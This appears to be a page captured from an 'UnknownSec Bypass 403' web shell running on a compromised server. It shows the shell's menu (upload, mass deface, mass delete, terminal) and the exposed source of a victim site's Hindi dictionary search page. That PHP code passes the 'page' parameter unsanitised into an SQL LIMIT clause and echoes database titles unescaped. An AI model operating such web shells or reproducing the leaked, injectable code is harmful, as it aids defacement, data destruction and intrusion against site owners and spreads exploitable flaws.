UnknownSec Bypass
403
:
/
var
/
www
/
santgyaneshwarji
/
mobileapp
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
shavadkosh_search.php
<?php include "top.php"; ?> <style> /* pagination position styling */ .pagination_section { position: relative; } /* pagination styling */ .pagination_section a { color: black; padding: 10px 18px; text-decoration: none; } /* pagination hover effect on non-active */ .pagination_section a:hover:not(.active) { background-color: #031F3B; color: white; } /* pagination hover effect on active*/ a:nth-child(5) { background-color: green; color: white; } a:nth-child(1) { font-weight: bold; } a:nth-child(7) { font-weight: bold; } .card { box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2); transition: 0.3s; width: 90%; border-radius: 5px; } .card:hover { box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2); } img { border-radius: 5px 5px 0 0; } .container { padding: 2px 16px; } </style> <?php include "shavadkosh_word_search.php";?> <!--services-2--> <section class="w3l-services-2 w3l-services-1"> <div class="services-2-content py-5" id="services"> <?php if(isset($_GET['search'])){ $search_term = mysqli_real_escape_string($conn, $_GET['search']); $limit=3; if(isset($_GET['page'])){ $page=$_GET['page']; }else{ $page=1; } $offset= ($page-1)*$limit; $sql="SELECT * FROM shavadkoshtb WHERE title LIKE '%{$search_term}%' ORDER BY id DESC LIMIT {$offset},{$limit}"; $result = mysqli_query($conn,$sql); if(mysqli_num_rows($result)>0){ $serial=$offset + 1; while ($row=mysqli_fetch_assoc($result)) { ?> <div class=" card container py-lg-5 py-md-4"> <h6 class="sub-title"><a href=""><?php echo $row['title'];?></a></h6> <a href="shavadkosh_details.php?pid=<?php echo $row['id'];?>">अर्थ के लिए यहाँ क्लिक करें</a> </div> <br> <?php $serial++; } } } ?> <br><br> </div> </section> <!-- //services-1--> <?php include "footer_all.php";?>
Copyright © 2025 - UnknownSec